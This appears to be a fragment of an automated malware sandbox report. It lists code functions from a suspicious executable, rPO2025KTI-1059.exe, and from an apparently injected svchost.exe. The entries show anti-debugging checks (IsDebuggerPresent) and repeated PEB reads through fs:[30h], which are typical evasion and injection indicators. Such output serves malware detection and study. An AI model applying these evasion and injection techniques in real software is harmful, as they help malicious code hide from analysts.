Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00765A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00765A7C
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00734B37 LoadLibraryA,GetProcAddress, 0_2_00734B37
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_01FC34F0 mov eax, dword ptr fs:[00000030h] 0_2_01FC34F0
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_01FC3490 mov eax, dword ptr fs:[00000030h] 0_2_01FC3490
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_01FC1E70 mov eax, dword ptr fs:[00000030h] 0_2_01FC1E70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CEC3CD mov eax, dword ptr fs:[00000030h] 1_2_03CEC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] 1_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] 1_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] 1_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] 1_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB63C0 mov eax, dword ptr fs:[00000030h] 1_2_03CB63C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h] 1_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h] 1_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDE3DB mov ecx, dword ptr fs:[00000030h] 1_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h] 1_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h] 1_2_03CD43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h] 1_2_03CD43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] 1_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] 1_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] 1_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C663FF mov eax, dword ptr fs:[00000030h] 1_2_03C663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h] 1_2_03C2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h] 1_2_03C2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h] 1_2_03C2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h] 1_2_03C5438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h] 1_2_03C5438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h] 1_2_03C28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h] 1_2_03C28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h] 1_2_03C28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h] 1_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h] 1_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h] 1_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB035C mov ecx, dword ptr fs:[00000030h] 1_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h] 1_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h] 1_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFA352 mov eax, dword ptr fs:[00000030h] 1_2_03CFA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD8350 mov ecx, dword ptr fs:[00000030h] 1_2_03CD8350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D0634F mov eax, dword ptr fs:[00000030h] 1_2_03D0634F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD437C mov eax, dword ptr fs:[00000030h] 1_2_03CD437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h] 1_2_03C6A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h] 1_2_03C6A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h] 1_2_03C6A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2C310 mov ecx, dword ptr fs:[00000030h] 1_2_03C2C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C50310 mov ecx, dword ptr fs:[00000030h] 1_2_03C50310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h] 1_2_03D08324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D08324 mov ecx, dword ptr fs:[00000030h] 1_2_03D08324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h] 1_2_03D08324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h] 1_2_03D08324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D062D6 mov eax, dword ptr fs:[00000030h] 1_2_03D062D6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h] 1_2_03C402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h] 1_2_03C402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h] 1_2_03C402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h] 1_2_03C6E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h] 1_2_03C6E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h] 1_2_03CB0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h] 1_2_03CB0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h] 1_2_03CB0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h] 1_2_03C402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h] 1_2_03C402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 1_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC62A0 mov ecx, dword ptr fs:[00000030h] 1_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 1_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 1_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 1_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 1_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB8243 mov eax, dword ptr fs:[00000030h] 1_2_03CB8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB8243 mov ecx, dword ptr fs:[00000030h] 1_2_03CB8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D0625D mov eax, dword ptr fs:[00000030h] 1_2_03D0625D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2A250 mov eax, dword ptr fs:[00000030h] 1_2_03C2A250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C36259 mov eax, dword ptr fs:[00000030h] 1_2_03C36259
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h] 1_2_03CEA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h] 1_2_03CEA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h] 1_2_03C34260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h] 1_2_03C34260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h] 1_2_03C34260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2826B mov eax, dword ptr fs:[00000030h] 1_2_03C2826B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2823B mov eax, dword ptr fs:[00000030h] 1_2_03C2823B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h] 1_2_03CF61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h] 1_2_03CF61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 1_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 1_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h] 1_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 1_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 1_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D061E5 mov eax, dword ptr fs:[00000030h] 1_2_03D061E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C601F8 mov eax, dword ptr fs:[00000030h] 1_2_03C601F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C70185 mov eax, dword ptr fs:[00000030h] 1_2_03C70185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h] 1_2_03CEC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h] 1_2_03CEC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h] 1_2_03CD4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h] 1_2_03CD4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h] 1_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h] 1_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h] 1_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h] 1_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h] 1_2_03C2A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h] 1_2_03C2A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h] 1_2_03C2A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h] 1_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h] 1_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC4144 mov ecx, dword ptr fs:[00000030h] 1_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h] 1_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h] 1_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2C156 mov eax, dword ptr fs:[00000030h] 1_2_03C2C156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC8158 mov eax, dword ptr fs:[00000030h] 1_2_03CC8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h] 1_2_03C36154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h] 1_2_03C36154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h] 1_2_03D04164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h] 1_2_03D04164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h] 1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h] 1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h] 1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h] 1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h] 1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h] 1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h] 1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h] 1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h] 1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h] 1_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDA118 mov ecx, dword ptr fs:[00000030h] 1_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h] 1_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h] 1_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h] 1_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF0115 mov eax, dword ptr fs:[00000030h] 1_2_03CF0115
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C60124 mov eax, dword ptr fs:[00000030h] 1_2_03C60124
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB20DE mov eax, dword ptr fs:[00000030h] 1_2_03CB20DE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h] 1_2_03C2A0E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C380E9 mov eax, dword ptr fs:[00000030h] 1_2_03C380E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB60E0 mov eax, dword ptr fs:[00000030h] 1_2_03CB60E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2C0F0 mov eax, dword ptr fs:[00000030h] 1_2_03C2C0F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C720F0 mov ecx, dword ptr fs:[00000030h] 1_2_03C720F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3208A mov eax, dword ptr fs:[00000030h] 1_2_03C3208A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C280A0 mov eax, dword ptr fs:[00000030h] 1_2_03C280A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC80A8 mov eax, dword ptr fs:[00000030h] 1_2_03CC80A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF60B8 mov eax, dword ptr fs:[00000030h] 1_2_03CF60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF60B8 mov ecx, dword ptr fs:[00000030h] 1_2_03CF60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C32050 mov eax, dword ptr fs:[00000030h] 1_2_03C32050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB6050 mov eax, dword ptr fs:[00000030h] 1_2_03CB6050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C5C073 mov eax, dword ptr fs:[00000030h] 1_2_03C5C073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB4000 mov ecx, dword ptr fs:[00000030h] 1_2_03CB4000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h] 1_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h] 1_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h] 1_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h] 1_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h] 1_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h] 1_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h] 1_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h] 1_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h] 1_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h] 1_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h] 1_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h] 1_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2A020 mov eax, dword ptr fs:[00000030h] 1_2_03C2A020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2C020 mov eax, dword ptr fs:[00000030h] 1_2_03C2C020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC6030 mov eax, dword ptr fs:[00000030h] 1_2_03CC6030
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3C7C0 mov eax, dword ptr fs:[00000030h] 1_2_03C3C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB07C3 mov eax, dword ptr fs:[00000030h] 1_2_03CB07C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h] 1_2_03C527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h] 1_2_03C527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h] 1_2_03C527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CBE7E1 mov eax, dword ptr fs:[00000030h] 1_2_03CBE7E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h] 1_2_03C347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h] 1_2_03C347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD678E mov eax, dword ptr fs:[00000030h] 1_2_03CD678E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C307AF mov eax, dword ptr fs:[00000030h] 1_2_03C307AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE47A0 mov eax, dword ptr fs:[00000030h] 1_2_03CE47A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C6674D mov esi, dword ptr fs:[00000030h] 1_2_03C6674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h] 1_2_03C6674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h] 1_2_03C6674D
